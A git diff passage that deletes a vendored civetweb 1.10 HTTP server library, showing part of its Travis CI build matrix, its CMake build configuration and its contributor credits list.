-      ENABLE_CXX=NO

-      ENABLE_LUA_SHARED=NO

-      C_STANDARD=auto

-      CXX_STANDARD=auto

-      FEATURES=7

-      BUILD_SHARED=NO

-      NO_FILES=NO

-      ENABLE_SSL=YES

-      NO_CGI=NO

-      ENABLE_IPV6=NO

-      ENABLE_WEBSOCKETS=NO

-      ENABLE_LUA=NO

-      ENABLE_DUKTAPE=NO

-      NO_CACHING=NO

-      ALLOW_WARNINGS=YES

-

-  -

-    os: linux

-    compiler: gcc

-    env:

-      idx=17

-      N=GCCLinuxDefault_None

-      BUILD_TYPE=None

-      ENABLE_SSL_DYNAMIC_LOADING=YES

-      OPENSSL_1_1=NO

-      ENABLE_CXX=NO

-      ENABLE_LUA_SHARED=NO

-      C_STANDARD=auto

-      CXX_STANDARD=auto

-      FEATURES=7

-      BUILD_SHARED=NO

-      NO_FILES=NO

-      ENABLE_SSL=YES

-      NO_CGI=NO

-      ENABLE_IPV6=NO

-      ENABLE_WEBSOCKETS=NO

-      ENABLE_LUA=NO

-      ENABLE_DUKTAPE=NO

-      NO_CACHING=NO

-      ALLOW_WARNINGS=YES

-

-

-#### Now all define combinations, but only for Linux clang

-##### Generated with Lua:

-#

-#  function YN(i,b)

-#    local bits = {}

-#    while (i > 0.5) do

-#      i = math.floor(i)

-#      bits[#bits+1] = (math.mod(i, 2) == 1)

-#      i = i/2

-#    end

-#    if (bits[b]) then

-#      return "YES"

-#    end

-#    return "NO"

-#  end

-#  function INV(t)

-#    if t=="YES" then

-#      return "NO"

-#    elseif t=="NO" then

-#      return "YES"

-#    else

-#      assert("ERROR in INV!")

-#    end

-#  end

-#  for i=0,511 do

-#    if (YN(i, 6)=="NO") and (YN(i, 7)=="NO") then

-#      print("  -")

-#      print("    os: linux")

-#      print("    compiler: clang")

-#      print("    env:")

-#      print("      N=C" .. tostring(i) .. "_")

-#      print("      BUILD_TYPE=Release")

-#      print("      ENABLE_SSL_DYNAMIC_LOADING=YES")

-#      print("      OPENSSL_1_1=NO")

-#      print("      ENABLE_CXX=NO")

-#      print("      C_STANDARD=auto")

-#      print("      CXX_STANDARD=auto")

-#      print("      ENABLE_LUA_SHARED=NO")

-#      print("      FEATURES=" .. tostring(i))

-#      print("      BUILD_SHARED=NO")

-#      print("      NO_FILES=" .. INV(YN(i, 1)))

-#      print("      ENABLE_SSL=" .. YN(i, 2))

-#      print("      NO_CGI=" .. INV(YN(i, 3)))

-#      print("      ENABLE_IPV6=" .. YN(i, 4))

-#      print("      ENABLE_WEBSOCKETS=" .. YN(i, 5))

-#      print("      ENABLE_LUA=" .. YN(i, 6))

-#      print("      ENABLE_DUKTAPE=" .. YN(i, 7))

-#      print("      NO_CACHING=" .. INV(YN(i, 8)))

-#      print("      ENABLE_SERVER_STATS=" .. YN(i, 9))

-#      print("")

-#    end

-#  end

-#

-

-# TODO: Regenerate this matrix, once a stable Travis build is re-established

-

-

diff --git a/thirdparty/civetweb-1.10/CMakeLists.txt b/thirdparty/civetweb-1.10/CMakeLists.txt
deleted file mode 100644
index f559a04..0000000
--- a/thirdparty/civetweb-1.10/CMakeLists.txt
+++ /dev/null
@@ -1,492 +0,0 @@
-# Determines what CMake APIs we can rely on
-cmake_minimum_required (VERSION 2.8.11)
-if (${CMAKE_VERSION} VERSION_GREATER 3.2.2)
-  cmake_policy(VERSION 3.2.2)
-endif()
-if (${CMAKE_VERSION} VERSION_GREATER 3.1 OR
-    ${CMAKE_VERSION} VERSION_EQUAL 3.1)
-  cmake_policy(SET CMP0054 NEW)
-endif()
-
-# Do not allow in source builds
-set(CMAKE_DISABLE_SOURCE_CHANGES ON)
-set(CMAKE_DISABLE_IN_SOURCE_BUILD ON)
-
-# Make sure we can import out CMake functions
-list(APPEND CMAKE_MODULE_PATH "${CMAKE_CURRENT_SOURCE_DIR}/cmake")
-
-# Load in the needed CMake modules
-include(CheckIncludeFiles)
-include(CheckCCompilerFlag)
-include(CheckCXXCompilerFlag)
-include(AddCCompilerFlag)
-include(AddCXXCompilerFlag)
-include(DetermineTargetArchitecture)
-include(CMakeDependentOption)
-
-# Set up the project
-project (civetweb)
-set(CIVETWEB_VERSION "1.10.0" CACHE STRING "The version of the civetweb library")
-string(REGEX MATCH "([0-9]+)\\.([0-9]+)\\.([0-9]+)" CIVETWEB_VERSION_MATCH "${CIVETWEB_VERSION}")
-if ("${CIVETWEB_VERSION_MATCH}" STREQUAL "")
-  message(FATAL_ERROR "Must specify a semantic version: major.minor.patch")
-endif()
-set(CIVETWEB_VERSION_MAJOR "${CMAKE_MATCH_1}")
-set(CIVETWEB_VERSION_MINOR "${CMAKE_MATCH_2}")
-set(CIVETWEB_VERSION_PATCH "${CMAKE_MATCH_3}")
-determine_target_architecture(CIVETWEB_ARCHITECTURE)
-
-# Detect the platform reliably
-if(NOT MACOSX AND ${CMAKE_SYSTEM_NAME} MATCHES "Darwin")
-   SET(DARWIN YES)
-elseif(NOT BSD AND ${CMAKE_SYSTEM_NAME} MATCHES "FreeBSD")
-    SET(FREEBSD YES)
-elseif(NOT LINUX AND ${CMAKE_SYSTEM_NAME} MATCHES "Linux")
-    SET(LINUX YES)
-endif()
-
-# C++ wrappers
-option(CIVETWEB_ENABLE_THIRD_PARTY_OUTPUT "Shows the output of third party dependency processing" OFF)
-
-# Thread Stack Size
-set(CIVETWEB_THREAD_STACK_SIZE 102400 CACHE STRING
-  "The stack size in bytes for each thread created")
-set_property(CACHE CIVETWEB_THREAD_STACK_SIZE PROPERTY VALUE ${CIVETWEB_THREAD_STACK_SIZE})
-message(STATUS "Thread Stack Size - ${CIVETWEB_THREAD_STACK_SIZE}")
-
-# Serve no files from the web server
-option(CIVETWEB_SERVE_NO_FILES "Configures the server to serve no static files" OFF)
-message(STATUS "Serve no static files - ${CIVETWEB_SERVE_NO_FILES}")
-
-# Serve no files from the web server
-option(CIVETWEB_DISABLE_CGI "Disables CGI, so theserver will not execute CGI scripts" OFF)
-message(STATUS "Disable CGI support - ${CIVETWEB_DISABLE_CGI}")
-
-# Disable caching
-option(CIVETWEB_DISABLE_CACHING "Disables caching, so that no timegm is used." OFF)
-message(STATUS "Disable caching support - ${CIVETWEB_DISABLE_CACHING}")
-
-# C++ wrappers
-option(CIVETWEB_ENABLE_CXX "Enables the C++ wrapper library" OFF)
-message(STATUS "C++ wrappers - ${CIVETWEB_ENABLE_CXX}")
-
-# IP Version 6
-option(CIVETWEB_ENABLE_IPV6 "Enables the IP version 6 support" OFF)
-message(STATUS "IP Version 6 - ${CIVETWEB_ENABLE_IPV6}")
-
-# Websocket support
-option(CIVETWEB_ENABLE_WEBSOCKETS "Enable websockets connections" OFF)
-message(STATUS "Websockets support - ${CIVETWEB_ENABLE_WEBSOCKETS}")
-
-# Server statistics support
-option(CIVETWEB_ENABLE_SERVER_STATS "Enable server statistics" OFF)
-message(STATUS "Server statistics support - ${CIVETWEB_ENABLE_SERVER_STATS}")
-
-# Memory debugging
-option(CIVETWEB_ENABLE_MEMORY_DEBUGGING "Enable the memory debugging features" OFF)
-message(STATUS "Memory Debugging - ${CIVETWEB_ENABLE_MEMORY_DEBUGGING}")
-
-# ASAN in debug mode (-fsanitize=address, etc)
-option(CIVETWEB_ENABLE_ASAN "Enable ASAN in debug mode" ON)
-message(STATUS "ASAN in debug mode - ${CIVETWEB_ENABLE_ASAN}")
-
-# ARCH flag
-option(CIVETWEB_ARCH "Force 32/64 bit architecture" OFF)
-message(STATUS "Force x32 / x64 architecture - ${CIVETWEB_ARCH}")
-
-# LUA CGI support
-option(CIVETWEB_ENABLE_LUA "Enable Lua CGIs" OFF)
-message(STATUS "Lua CGI support - ${CIVETWEB_ENABLE_LUA}")
-
-# Enable installing CivetWeb executables
-option(CIVETWEB_INSTALL_EXECUTABLE "Enable installing CivetWeb executable" ON)
-mark_as_advanced(FORCE CIVETWEB_INSTALL_EXECUTABLE) # Advanced users can disable
-message(STATUS "Executable installation - ${CIVETWEB_INSTALL_EXECUTABLE}") 
-
-# Allow builds to complete with warnings (do not set -Werror)
-# CivetWeb Linux support is stable:
-# Builds for GCC 4.6 and clang 3.4 are free from warnings.
-# However, GCC introduced a couple of new, partially idiotic warnings,
-# that can not be disabled using a #pragma directive.
-# It seems unreasonable to have all GCC versions warning free, but only
-# some selected ones.
-option(CIVETWEB_ALLOW_WARNINGS "Do not stop build if there are warnings" ON)
-message(STATUS "Build if there are warnings - ${CIVETWEB_ALLOW_WARNINGS}")
-
-# Link to the shared LUA library
-cmake_dependent_option(
-  CIVETWEB_ENABLE_LUA_SHARED  "Link to the shared LUA system library" OFF
- CIVETWEB_ENABLE_LUA OFF)
-if (CIVETWEB_ENABLE_LUA)
-  message(STATUS "Linking shared Lua library - ${CIVETWEB_ENABLE_LUA_SHARED}")
-endif()
-
-# Lua Third Party Settings
-if (CIVETWEB_ENABLE_LUA)
-  if (NOT CIVETWEB_ENABLE_LUA_SHARED)
-    # Lua Version
-    set(CIVETWEB_LUA_VERSION 5.2.4 CACHE STRING
-      "The version of Lua to build and include statically")
-    set_property(CACHE CIVETWEB_LUA_VERSION PROPERTY VALUE ${CIVETWEB_LUA_VERSION})
-    message(STATUS "Lua Version - ${CIVETWEB_LUA_VERSION}")
-    mark_as_advanced(CIVETWEB_LUA_VERSION)
-
-    # Lua Verification Hash
-    set(CIVETWEB_LUA_MD5_HASH 913fdb32207046b273fdb17aad70be13 CACHE STRING
-      "The hash of Lua archive to be downloaded")
-    set_property(CACHE CIVETWEB_LUA_MD5_HASH PROPERTY VALUE ${CIVETWEB_LUA_MD5_HASH})
-    mark_as_advanced(CIVETWEB_LUA_MD5_HASH)
-  endif()
-
-  # Lua Filesystem Version
-  set(CIVETWEB_LUA_FILESYSTEM_VERSION 1.6.3 CACHE STRING
-    "The version of Lua Filesystem to build and include statically")
-  set_property(CACHE CIVETWEB_LUA_FILESYSTEM_VERSION PROPERTY VALUE ${CIVETWEB_LUA_FILESYSTEM_VERSION})
-  message(STATUS "Lua Filesystem Version - ${CIVETWEB_LUA_FILESYSTEM_VERSION}")
-  mark_as_advanced(CIVETWEB_LUA_FILESYSTEM_VERSION)
-
-  # Lua Filesystem Verification Hash
-  set(CIVETWEB_LUA_FILESYSTEM_MD5_HASH d0552c7e5a082f5bb2865af63fb9dc95 CACHE STRING
-    "The hash of Lua Filesystem archive to be downloaded")
-  set_property(CACHE CIVETWEB_LUA_FILESYSTEM_MD5_HASH PROPERTY VALUE ${CIVETWEB_LUA_FILESYSTEM_MD5_HASH})
-  mark_as_advanced(CIVETWEB_LUA_FILESYSTEM_MD5_HASH)
-
-  # Lua SQLite Version
-  set(CIVETWEB_LUA_SQLITE_VERSION 0.9.3 CACHE STRING
-    "The version of Lua SQLite to build and include statically")
-  set_property(CACHE CIVETWEB_LUA_SQLITE_VERSION PROPERTY VALUE ${CIVETWEB_LUA_SQLITE_VERSION})
-  message(STATUS "Lua SQLite Version - ${CIVETWEB_LUA_SQLITE_VERSION}")
-  mark_as_advanced(CIVETWEB_LUA_SQLITE_VERSION)
-
-  # Lua SQLite Verification Hash
-  set(CIVETWEB_LUA_SQLITE_MD5_HASH 43234ae08197dfce6da02482ed14ec92 CACHE STRING
-    "The hash of Lua SQLite archive to be downloaded")
-  set_property(CACHE CIVETWEB_LUA_SQLITE_MD5_HASH PROPERTY VALUE ${CIVETWEB_LUA_SQLITE_MD5_HASH})
-  mark_as_advanced(CIVETWEB_LUA_SQLITE_MD5_HASH)
-
-  # Lua XML Version
-  set(CIVETWEB_LUA_XML_VERSION 1.8.0 CACHE STRING
-    "The version of Lua XML to build and include statically")
-  set_property(CACHE CIVETWEB_LUA_XML_VERSION PROPERTY VALUE ${CIVETWEB_LUA_XML_VERSION})
-  message(STATUS "Lua XML Version - ${CIVETWEB_LUA_XML_VERSION}")
-  mark_as_advanced(CIVETWEB_LUA_XML_VERSION)
-
-  # Lua XML Verification Hash
-  set(CIVETWEB_LUA_XML_MD5_HASH 25e4c276c5d8716af1de0c7853aec2b4 CACHE STRING
-    "The hash of Lua XML archive to be downloaded")
-  set_property(CACHE CIVETWEB_LUA_XML_MD5_HASH PROPERTY VALUE ${CIVETWEB_LUA_XML_MD5_HASH})
-  mark_as_advanced(CIVETWEB_LUA_XML_MD5_HASH)
-
-  # SQLite Version
-  set(CIVETWEB_SQLITE_VERSION 3.8.9 CACHE STRING
-    "The version of SQLite to build and include statically")
-  set_property(CACHE CIVETWEB_SQLITE_VERSION PROPERTY VALUE ${CIVETWEB_SQLITE_VERSION})
-  message(STATUS "SQLite Version - ${CIVETWEB_SQLITE_VERSION}")
-  mark_as_advanced(CIVETWEB_SQLITE_VERSION)
-
-  # SQLite Verification Hash
-  set(CIVETWEB_SQLITE_MD5_HASH 02e9c3a6daa8b8587cf6bef828c2e33f CACHE STRING
-    "The hash of SQLite archive to be downloaded")
-  set_property(CACHE CIVETWEB_SQLITE_MD5_HASH PROPERTY VALUE ${CIVETWEB_SQLITE_MD5_HASH})
-  mark_as_advanced(CIVETWEB_SQLITE_MD5_HASH)
-endif()
-
-# Duktape CGI support
-option(CIVETWEB_ENABLE_DUKTAPE "Enable Duktape CGIs" OFF)
-message(STATUS "Duktape CGI support - ${CIVETWEB_ENABLE_DUKTAPE}")
-
-# SSL support
-option(CIVETWEB_ENABLE_SSL "Enables the secure socket layer" ON)
-message(STATUS "SSL support - ${CIVETWEB_ENABLE_SSL}")
-
-# OpenSSL 1.1 API
-option(CIVETWEB_SSL_OPENSSL_API_1_1 "Use the OpenSSL 1.1 API" OFF)
-message(STATUS "Compile for OpenSSL 1.1 API - ${CIVETWEB_SSL_OPENSSL_API_1_1}")
-
-# Dynamically load or link the SSL libraries
-cmake_dependent_option(
-  CIVETWEB_ENABLE_SSL_DYNAMIC_LOADING "Dynamically loads the SSL library rather than linking it" ON
-  CIVETWEB_ENABLE_SSL OFF)
-if (CIVETWEB_ENABLE_SSL)
-  message(STATUS "Dynamically load SSL libraries - ${CIVETWEB_ENABLE_SSL_DYNAMIC_LOADING}")
-endif()
-
-# Third Party Download location
-set(CIVETWEB_THIRD_PARTY_DIR "${CMAKE_BINARY_DIR}/third_party" CACHE STRING
-  "The location that third party code is downloaded, built and installed")
-set_property(CACHE CIVETWEB_THIRD_PARTY_DIR PROPERTY VALUE ${CIVETWEB_THIRD_PARTY_DIR})
-
-# Unix systems can define the dynamic library names to load
-if (CIVETWEB_ENABLE_SSL_DYNAMIC_LOADING AND NOT DARWIN AND UNIX)
-  # SSL library name
-  set(CIVETWEB_SSL_SSL_LIB "libssl.so" CACHE STRING
-    "The name of the SSL library to load")
-  set_property(CACHE CIVETWEB_SSL_SSL_LIB PROPERTY VALUE ${CIVETWEB_SSL_SSL_LIB})
-  message(STATUS "SSL Library Name - ${CIVETWEB_SSL_SSL_LIB}")
-
-  # Crytography library name
-  set(CIVETWEB_SSL_CRYPTO_LIB "libcrypto.so" CACHE STRING
-    "The name of the SSL Cryptography library to load")
-  set_property(CACHE CIVETWEB_SSL_CRYPTO_LIB PROPERTY VALUE ${CIVETWEB_SSL_CRYPTO_LIB})
-  message(STATUS "SSL Cryptography Library Name - ${CIVETWEB_SSL_CRYPTO_LIB}")
-endif()
-
-# Allow warnings in 3rd party components
-if (CIVETWEB_ENABLE_LUA OR CIVETWEB_ENABLE_DUKTAPE)
-SET(CIVETWEB_ALLOW_WARNINGS YES)
-endif()
-
-# The C and C++ standards to use
-set(CIVETWEB_C_STANDARD auto CACHE STRING
-  "The C standard to use; auto determines the latest supported by the compiler")
-set_property(CACHE CIVETWEB_C_STANDARD PROPERTY STRINGS auto c11 c99 c89)
-set(CIVETWEB_CXX_STANDARD auto CACHE STRING
-  "The C++ standard to use; auto determines the latest supported by the compiler")
-set_property(CACHE CIVETWEB_CXX_STANDARD PROPERTY STRINGS auto c++14 c++11 c++98)
-
-# Configure the linker
-if ("${CMAKE_C_COMPILER_ID}" STREQUAL "GNU")
-  find_program(GCC_AR gcc-ar)
-  if (GCC_AR)
-    set(CMAKE_AR ${GCC_AR})
-  endif()
-  find_program(GCC_RANLIB gcc-ranlib)
-  if (GCC_RANLIB)
-    set(CMAKE_RANLIB ${GCC_RANLIB})
-  endif()
-endif()
-
-# Configure the C compiler
-message(STATUS "Configuring C Compiler")
-if ("${CIVETWEB_C_STANDARD}" STREQUAL "auto")
-  add_c_compiler_flag(-std=c11)
-  if (NOT HAVE_C_FLAG_STD_C11)
-    add_c_compiler_flag(-std=c99)
-    if (NOT HAVE_C_FLAG_STD_C99)
-      add_c_compiler_flag(-std=c89)
-    endif()
-  endif()
-else()
-  add_c_compiler_flag(-std=${CIVETWEB_C_STANDARD})
-endif()
-
-#Warnings: enable everything
-add_c_compiler_flag(-Wall)
-add_c_compiler_flag(-Wextra)
-add_c_compiler_flag(-Wshadow)
-add_c_compiler_flag(-Wconversion)
-add_c_compiler_flag(-Wmissing-prototypes)
-add_c_compiler_flag(-Weverything)
-add_c_compiler_flag(-Wparentheses)
-add_c_compiler_flag(/W4) # VisualStudio highest warning level
-
-#Warnings: Disable some warnings
-add_c_compiler_flag(-Wno-padded) # padding in structures by compiler
-add_c_compiler_flag(-Wno-unused-macros) # so what?
-add_c_compiler_flag(-Wno-reserved-id-macros) # for system headers
-add_c_compiler_flag(-Wno-format-nonliteral) # printf(myFormatStringVar, ...)
-add_c_compiler_flag(-Wno-date-time) # using __DATE__ once
-add_c_compiler_flag(-Wno-cast-qual) # const cast
-add_c_compiler_flag(-Wno-unknown-warning-option) # Xcode 9
-add_c_compiler_flag(/Wd4820) # padding
-
-if (MINGW)
-  add_c_compiler_flag(-Wno-format)
-endif()
-if (NOT CIVETWEB_ALLOW_WARNINGS)
-  add_c_compiler_flag(-Werror)
-endif()
-add_c_compiler_flag(/WX)
-add_c_compiler_flag(-pedantic-errors)
-add_c_compiler_flag(-fvisibility=hidden)
-add_c_compiler_flag(-fstack-protector-strong RELEASE)
-add_c_compiler_flag(-flto RELEASE)
-
-add_c_compiler_flag(-fstack-protector-all DEBUG)
-if (MINGW)
-  add_c_compiler_flag(-mwindows)
-endif()
-
-# Coverage build type
-set(CMAKE_C_FLAGS_COVERAGE "${CMAKE_C_FLAGS_DEBUG}" CACHE STRING
-    "Flags used by the C compiler during coverage builds."
-    FORCE)
-set(CMAKE_EXE_LINKER_FLAGS_COVERAGE
-    "${CMAKE_EXE_LINKER_FLAGS_DEBUG}" CACHE STRING
-    "Flags used for linking binaries during coverage builds."
-    FORCE)
-set(CMAKE_SHARED_LINKER_FLAGS_COVERAGE
-    "${CMAKE_SHARED_LINKER_FLAGS_DEBUG}" CACHE STRING
-    "Flags used by the shared libraries linker during coverage builds."
-    FORCE)
-mark_as_advanced(
-    CMAKE_CXX_FLAGS_COVERAGE
-    CMAKE_C_FLAGS_COVERAGE
-    CMAKE_EXE_LINKER_FLAGS_COVERAGE
-    CMAKE_SHARED_LINKER_FLAGS_COVERAGE)
-set(CMAKE_BUILD_TYPE "${CMAKE_BUILD_TYPE}" CACHE STRING
-    "Choose the type of build, options are: None Debug Release RelWithDebInfo MinSizeRel Coverage."
-    FORCE)
-add_c_compiler_flag(--coverage COVERAGE)
-
-# Configure the C++ compiler
-if (CIVETWEB_ENABLE_CXX)
-  message(STATUS "Configuring C++ Compiler")
-  if ("${CIVETWEB_CXX_STANDARD}" STREQUAL "auto")
-    add_cxx_compiler_flag(-std=c++14)
-    if (NOT HAVE_CXX_FLAG_STD_CXX14)
-      add_cxx_compiler_flag(-std=c++11)
-      if (NOT HAVE_CXX_FLAG_STD_CXX11)
-        add_cxx_compiler_flag(-std=c++98)
-      endif()
-    endif()
-  else()
-    add_cxx_compiler_flag(-std=${CIVETWEB_CXX_STANDARD})
-  endif()
-  add_cxx_compiler_flag(-Wall)
-  add_cxx_compiler_flag(-Wextra)
-  add_cxx_compiler_flag(-Wshadow)
-  add_cxx_compiler_flag(-Wmissing-prototypes)
-  add_cxx_compiler_flag(-Weverything)
-  add_cxx_compiler_flag(/W4)
-  add_cxx_compiler_flag(-Wno-padded)
-  add_cxx_compiler_flag(/Wd4820) # padding
-  add_cxx_compiler_flag(-Wno-unused-macros)
-  add_cxx_compiler_flag(-Wno-format-nonliteral)
-  if (MINGW)
-    add_cxx_compiler_flag(-Wno-format)
-  endif()
-  if (NOT CIVETWEB_ALLOW_WARNINGS)
-    add_cxx_compiler_flag(-Werror)
-  endif()
-  add_cxx_compiler_flag(/WX)
-  add_cxx_compiler_flag(-pedantic-errors)
-  add_cxx_compiler_flag(-fvisibility=hidden)
-  add_cxx_compiler_flag(-fstack-protector-strong RELEASE)
-  add_cxx_compiler_flag(-flto RELEASE)
-
-  add_cxx_compiler_flag(-fstack-protector-all DEBUG)
-  if (MINGW)
-    add_cxx_compiler_flag(-mwindows)
-  endif()
-  set(CMAKE_CXX_FLAGS_COVERAGE "${CMAKE_CXX_FLAGS_DEBUG}" CACHE STRING
-      "Flags used by the C++ compiler during coverage builds."
-      FORCE)
-  add_cxx_compiler_flag(--coverage COVERAGE)
-endif()
-
-# Set up the definitions
-if (${CMAKE_BUILD_TYPE} MATCHES "[Dd]ebug")
-  add_definitions(-DDEBUG)
-endif()
-if (CIVETWEB_ENABLE_IPV6)
-  add_definitions(-DUSE_IPV6)
-endif()
-if (CIVETWEB_ENABLE_WEBSOCKETS)
-  add_definitions(-DUSE_WEBSOCKET)
-endif()
-if (CIVETWEB_ENABLE_SERVER_STATS)
-  add_definitions(-DUSE_SERVER_STATS)
-endif()
-if (CIVETWEB_SERVE_NO_FILES)
-  add_definitions(-DNO_FILES)
-endif()
-if (CIVETWEB_DISABLE_CGI)
-  add_definitions(-DNO_CGI)
-endif()
-if (CIVETWEB_DISABLE_CACHING)
-  add_definitions(-DNO_CACHING)
-endif()
-if (CIVETWEB_ENABLE_LUA)
-  add_definitions(-DUSE_LUA)
-endif()
-if (CIVETWEB_ENABLE_DUKTAPE)
-  add_definitions(-DUSE_DUKTAPE)
-endif()
-if (CIVETWEB_ENABLE_MEMORY_DEBUGGING)
-  add_definitions(-DMEMORY_DEBUGGING)
-endif()
-if (NOT CIVETWEB_ENABLE_SSL)
-  add_definitions(-DNO_SSL)
-elseif (NOT CIVETWEB_ENABLE_SSL_DYNAMIC_LOADING)
-  add_definitions(-DNO_SSL_DL)
-else()
-  if(CIVETWEB_SSL_SSL_LIB)
-    add_definitions(-DSSL_LIB="${CIVETWEB_SSL_SSL_LIB}")
-  endif()
-  if(CIVETWEB_SSL_CRYPTO_LIB)
-    add_definitions(-DCRYPTO_LIB="${CIVETWEB_SSL_CRYPTO_LIB}")
-  endif()
-endif()
-if(CIVETWEB_SSL_OPENSSL_API_1_1)
-  add_definitions(-DOPENSSL_API_1_1)
-endif()
-add_definitions(-DUSE_STACK_SIZE=${CIVETWEB_THREAD_STACK_SIZE})
-
-# Set 32 or 64 bit environment
-if (${CMAKE_ARCH} MATCHES "[Xx]86")
-add_c_compiler_flag(-m32)
-endif()
-if (${CMAKE_ARCH} MATCHES "[Xx]64")
-add_c_compiler_flag(-m64)
-endif()
-# TODO: add support for -march
-
-# Build the targets
-add_subdirectory(src)
-
-# Enable the testing of the library/executable
-include(CTest)
-if (BUILD_CIVET_TESTING)
-  message(" -- CIVET TESTING ENABLED -- ")
-  # Check unit testing framework Version
-  set(CIVETWEB_CHECK_VERSION 0.11.0 CACHE STRING
-    "The version of Check unit testing framework to build and include statically")
-  set_property(CACHE CIVETWEB_CHECK_VERSION PROPERTY VALUE ${CIVETWEB_CHECK_VERSION})
-  message(STATUS "Check Unit Testing Framework Version - ${CIVETWEB_CHECK_VERSION}")
-  mark_as_advanced(CIVETWEB_CHECK_VERSION)
-
-  # Check unit testing framework Verification Hash
-  # Hash for Check 0.10.0: 67a34c40b5bc888737f4e5ae82e9939f
-  # Hash for Check 0.11.0: 1b14ee307dca8e954a8219c34484d7c4
-  set(CIVETWEB_CHECK_MD5_HASH 1b14ee307dca8e954a8219c34484d7c4 CACHE STRING
-    "The hash of Check unit testing framework archive to be downloaded")
-  set_property(CACHE CIVETWEB_CHECK_MD5_HASH PROPERTY VALUE ${CIVETWEB_CHECK_MD5_HASH})
-  mark_as_advanced(CIVETWEB_CHECK_MD5_HASH)
-
-  # Build the testing
-  add_subdirectory(test)
-endif()
-
-# Set up CPack
-include(InstallRequiredSystemLibraries)
-set(CPACK_PACKAGE_VENDOR "civetweb Contributors")
-set(CPACK_PACKAGE_CONTACT "civetweb@github.com")
-set(CPACK_PACKAGE_VERSION_MAJOR "${CIVETWEB_VERSION_MAJOR}")
-set(CPACK_PACKAGE_VERSION_MINOR "${CIVETWEB_VERSION_MINOR}")
-set(CPACK_PACKAGE_VERSION_PATCH "${CIVETWEB_VERSION_PATCH}")
-set(CPACK_PACKAGE_DESCRIPTION_SUMMARY "A HTTP library and server")
-set(CPACK_PACKAGE_DESCRIPTION_FILE "${CMAKE_CURRENT_SOURCE_DIR}/README.md")
-set(CPACK_RESOURCE_FILE_LICENSE "${CMAKE_CURRENT_SOURCE_DIR}/LICENSE.md")
-set(CPACK_STRIP_FILES TRUE)
-set(CPACK_PACKAGE_DEPENDS "openssl")
-if (CIVETWEB_ENABLE_LUA_SHARED)
-  set(CPACK_PACKAGE_DEPENDS "lua, ${CPACK_PACKAGE_DEPENDS}")
-endif()
-
-# RPM Packaging
-set(CPACK_RPM_PACKAGE_GROUP "Development/Libraries")
-set(CPACK_RPM_PACKAGE_LICENSE "MIT")
-set(CPACK_RPM_PACKAGE_ARCHITECTURE "${CIVETWEB_ARCHITECTURE}")
-set(CPACK_RPM_PACKAGE_REQUIRES "${CPACK_PACKAGE_DEPENDS}")
-
-# Debian Packaging
-set(CPACK_DEBIAN_PACKAGE_ARCHITECTURE "${CIVETWEB_ARCHITECTURE}")
-set(CPACK_DEBIAN_PACKAGE_HOMEPAGE "https://github.com/civetweb/civetweb")
-set(CPACK_DEBIAN_PACKAGE_DEPENDS "${CPACK_PACKAGE_DEPENDS}")
-
-# WiX Packaging
-# TODO: www.cmake.org/cmake/help/v3.0/module/CPackWIX.html
-
-# Finalize CPack settings
-include(CPack)
diff --git a/thirdparty/civetweb-1.10/CREDITS.md b/thirdparty/civetweb-1.10/CREDITS.md
deleted file mode 100644
index 4e4c987..0000000
--- a/thirdparty/civetweb-1.10/CREDITS.md
+++ /dev/null
@@ -1,167 +0,0 @@
-# Civetweb Contributors
-
-* Abhishek Lekshmanan
-* Adam Bailey
-* Alan Somers
-* Alex Kozlov
-* bel2125
-* Ben M. Ward
-* BigJoe
-* Bjoern Petri
-* Braedy Kuzma
-* brett
-* Brian Lambert
-* Brian Spratke
-* cdbishop
-* celeron55
-* Charles Olivi
-* Christian Mauderer
-* Christopher Galas
-* cjh
-* Daniel Oaks
-* Daniel Rempel
-* Danny Al-Gaaf
-* Dave Brower
-* David Arnold
-* David Loffredo
-* Dialga
-* ehlertjd
-* Eric Tsau
-* Erik Beran
-* extergnoto
-* F-Secure Corporation
-* feneuilflo
-* Fernando G. Aranda
-* Grahack
-* grenclave
-* grunk
-* hansipie
-* HariKamath Kamath
-* Henry Chang
-* Jack
-* Jacob Skillin
-* Jan Willem Janssen
-* Jeremy Lin
-* Jim Evans
-* jmc-
-* Jochen Scheib
-* Joe Mucchiello
-* Joel Gallant
-* Johan De Taeye
-* Jordan
-* Jordan Shelley
-* Joshua Boyd
-* Joshua D. Boyd
-* kakwa
-* kalphamon
-* Keith Kyzivat
-* Kevin Branigan
-* Kevin Wojniak
-* Kimmo Mustonen
-* Lammert Bies
-* Lawrence
-* Li Peng
-* Lianghui
-* Maarten Fremouw
-* makrsmark
-* Mark Lakata
-* Martin Gaida
-* Mateusz Gralka
-* Matt Clarkson
-* mingodad
-* Morgan McGuire
-* mrdvlpr.xnu
-* Neil Jensen
-* Nick Hildebrant
-* Nigel Stewart
-* nihildeb
-* No Face Press
-* palortoff
-* Patrick Drechsler
-* Patrick Trinkle
-* Paul Sokolovsky
-* Paulo Brizolara
-* pavel.pimenov
-* PavelVozenilek
-* Perttu Ahola
-* Peter Foerster
-* Philipp Friedenberger
-* Philipp Hasper
-* Red54
-* Richard Screene
-* pkvamme
-* Sage Weil
-* Sangwhan Moon
-* Saumitra Vikram
-* Scott Nations
-* sgmesservey
-* shantanugadgil
-* Simon Hailes
-* slidertom
-* SpaceLord
-* sunfch
-* thewaterymoon
-* THILMANT, Bernard
-* Thomas Davis
-* tnoho
-* Toni Wilk
-* Ulrich Hertlein
-* Walt Steverson
-* webxer
-* William Greathouse
-* xeoshow
-* xtne6f
-* Yehuda Sadeh
-
-# Mongoose Contributors
-CivetWeb is based on the Mongoose code.  The following users contributed to the original Mongoose release between 2010 and 2013.  This list was generated from the Mongoose GIT logs.  It does not contain contributions from the Mongoose mailing list.  There is no record for contributors prior to 2010.
-
-* Sergey Lyubka
-* Arnout Vandecappelle (Essensium/Mind)
-* Benoît Amiaux
-* Cody Hanson
-* Colin Leitner
-* Daniel Oaks
-* Eric Bakan
-* Erik Oomen
-* Filipp Kovalev
-* Ger Hobbelt
-* Hendrik Polczynski
-* Henrique Mendonça
-* Igor Okulist
-* Jay
-* Joe Mucchiello
-* John Safranek
-* Joseph Mainwaring
-* José Miguel Gonçalves
-* KIU Shueng Chuan
-* Katerina Blinova
-* Konstantin Sorokin
-* Marin Atanasov Nikolov
-* Matt Healy
-* Miguel Morales
-* Mikhail Nikalyukin
-* MikieMorales
-* Mitch Hendrickson
-* Nigel Stewart
-* Pavel
-* Pavel Khlebovich
-* Rogerz Zhang
-* Sebastian Reinhard
-* Stefan Doehla
-* Thileepan
-* abadc0de
-* arvidn
-* bick
-* ff.feng
-* jmucchiello
-* jwang
-* lsm
-* migal
-* mlamb
-* nullable.type
-* shantanugadgil
-* tayS
-* test
